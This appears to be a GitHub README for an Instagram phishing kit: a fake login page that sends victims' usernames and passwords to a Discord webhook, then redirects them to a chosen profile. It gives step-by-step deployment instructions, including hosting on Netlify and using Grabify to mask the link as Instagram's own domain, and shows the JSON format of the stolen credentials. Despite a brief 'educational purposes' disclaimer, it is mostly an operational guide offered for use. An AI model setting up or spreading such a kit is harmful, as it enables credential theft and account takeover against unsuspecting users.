This is a basic Instagram login page template with a fake login form designed for educational purposes only. It simulates an Instagram login page and sends the entered credentials to a specified Discord webhook.
- Simulates the Instagram login page with a form for username and password.
- When credentials are entered, they are sent to a Discord webhook.
- Redirects the user to a specified Instagram profile (can be changed)
-
Clone the repository to your local machine :
git clone https://github.com/XanderSteyn/Instagram-Phishing.git cd Instagram-Phishing
-
Host the Page :
- Upload
Index.html
andStyles.css
to a free hosting service like Netlify
- Upload
-
Make the Link More Convincing :
- Use a service like Grabify to shorten the URL
- Mask it to appear as if it’s coming from Instagram’s domain
-
Replace the placeholder
YOUR DISCORD WEBHOOK HERE
in the<script>
section with your own Discord webhook URL. -
Modify the URL in
window.location.replace("https://www.instagram.com/miakhalifa/?hl=en");
to redirect to any Instagram page of your choice after the form is submitted.
- The page appears as the Instagram login page.
- Once the user enters their username and password, the form data is sent to a Discord webhook in JSON format.
- After sending the data, the page redirects to a chosen Instagram profile.
When a user enters their username and password, the following data is sent to the Discord webhook :
{
"content": "> **USERNAME : **user123\n> **PASSWORD : **password123"
}
This project is meant to help understand how phishing attacks work for educational and ethical hacking purposes. Using such techniques for malicious purposes is illegal and unethical.
Please use responsibly.